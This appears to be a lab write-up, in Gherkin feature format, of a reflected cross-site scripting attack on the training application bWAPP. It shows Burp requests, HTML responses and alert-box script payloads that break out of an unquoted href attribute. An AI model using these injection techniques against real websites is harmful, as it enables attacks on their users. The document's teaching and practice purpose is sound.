# language: en

Feature: XSS Reflected - (HREF)
  From system bWAPP
  From the A3 - Cross Site Scripting
  With Low security level

Background:
  Given I am running Debian Stretch GNU/Linux kernel 4.9.0-6-amd64
  And I am using Firefox 52.7.3 (64-bit)
  And I am running Burp Suite Community edition v1.7.30
  Given the following in the url
  """
  URL: http://localhost/bWAPP/xss_href-1.php
  Message: XSS Reflected - (HREF)
  Details:
    - href-1 ask for user name in order to vote
    - href-2 displays a table with movies with a link to vote for each
    - href-3 displays the voted movie
  Objective: Perform cross site scripting
  """

Scenario: Application flow
Let's see the current flow of the votations to see where
the inject could take place
  Given an input form to put the username
  """
  # xss_href-1.html
  51  <div id="main">
  52  <h1>XSS - Reflected (HREF)</h1>
  53  <form action="xss_href-2.php" method="GET">
  54    <p>In order to vote for your favorite movie, \
        your name must be entered:</p>
  55    <input type="text" name="name">
  56    <button type="submit" name="action" value="vote">Continue</button>
  57  </form>
  58  </div>
  """
  When I use Burp to check what happens when I send my name
  Then I see there is a redirection using the name as param
  """
  # Burp Request
  GET /bWAPP/xss_href-2.php?name=Daniel&action=vote HTTP/1.1
  Host: 192.168.56.101
  ...
  ...
  Referer: http://192.168.56.101/bWAPP/xss_href-1.php
  Cookie: security_level=0; PHPSESSID=483e5164eebda6e071810dd0ee32f6ad
  Connection: close
  Upgrade-Insecure-Requests: 1

  There we can see the referer is the initial page, then it sends
  the name value as param to the xss_href-2
  """
  Then I look at the response on the browser
  """
  # xss-href-2.html
  51  <div id="main">
  52    <h1>XSS - Reflected (HREF)</h1>
  53    <p>Hello Daniel, please vote for your favorite movie.</p><p>\
  54      Remember, Tony Stark wants to win every time...</p>\
  55      <table id="table_yellow">
  56    <tr height="30" bgcolor="#ffb717" align="center">
  57      <td width="200"><b>Title</b></td>
  58      <td width="80"><b>Release</b></td>
  59      <td width="140"><b>Character</b></td>
  60      <td width="80"><b>Genre</b></td>
  61      <td width="80"><b>Vote</b></td>
  """
  And I see the table of movies within a column with a vote url
  """
  # xss-href-2.html
  <td align="center">action</td>
  <td align="center"> <a href=xss_href-3.php?\
  movie=1&name=Daniel&action=vote>Vote</a></td>
  """
  Then I see the username is again sent as param for another url
  And I vote for one of those to see what happens
  And I look first at the Burp request
  """
  # Burp Request
  GET /bWAPP/xss_href-3.php?movie=10&name=Daniel&action=vote HTTP/1.1
  ...
  ...
  Referer: http://192.168.56.101/bWAPP/xss_href-2.php?name=Daniel&action=vote
  Cookie: security_level=0; PHPSESSID=483e5164eebda6e071810dd0ee32f6ad
  Connection: close
  Upgrade-Insecure-Requests: 1

  I can see here, the same behaviour as before, this time an additional param
  is passed to the next url, the movie i picked
  """
  Then I look at the response in html
  """
  # xss_href-3.php
  <div id="main">
  <h1>XSS - Reflected (HREF)</h1>
  <p>Your favorite movie is: <b>World War Z</b></p\
  ><p>Thank you for submitting your vote!</p>
  </div>
  """
  And that's the correct behaviour of the votations

Scenario: Cross Site Scripting Down the vote!
  Given the first url to input the name
  Then I try to inject some javascript code
  """
  # xss_href-1.html
  Entered name: <script>alert("1")</alert>

  # Burp Request
  GET /bWAPP/xss_href-2.php?name=\
  %3Cscript%3Ealert%28%221%22%29%3C%2Fscript%3E&action=vote HTTP/1.1
  ...
  ...
  Referer: http://192.168.56.101/bWAPP/xss_href-1.php
  ...
  ...
  """
  And I look at the response just to see it wasn't included as I expected
  """
  # xss_href-2.html
  Hello <script>alert("1")</script>, please vote for your favorite movie.
  Remember, Tony Stark wants to win every time...

  Table vote column values renders:
  alert("1")&action=vote>Vote

  The html shows how it looks exactly
  <td align="center"> <a href=xss_href-3.php?\
  movie=1&name=<script>alert("1")</script>&action=vote>Vote</a></td>

  We got a fine clue rigth there!, there exist a first tag < a href..
  which isn't closed properly for the injected alert to be executed properly
  """
  Then I try again, this time closing the <a href... tag
  """
  # xss_href-1.html
  Entered name: /a><script>alert("1")</script>

  Testing on google chrome, ends within this output
  Chrome detected unusual code on this page and blocked it to
  protect your personal information (for example, passwords,
  phone numbers, and credit cards).
  Try visiting the site's homepage.
  ERR_BLOCKED_BY_XSS_AUDITOR
  """
  And I got to change to Firefox, at least, that's a good indicative
  """
  # Burp Request
  GET /bWAPP/xss_href-2.php?\
  name=%2Fa%3E%3Cscript%3Ealert%28%221%22%29%3C%2Fscript%3E&\
  action=vote HTTP/1.1
  Host: 192.168.56.101

  So far, there is not error by the browser, plus the response shown
  it's the expected alert!, for each row on that specific column
  the alert script it's executed
  """
  Then I injected succesfully arbitrary code


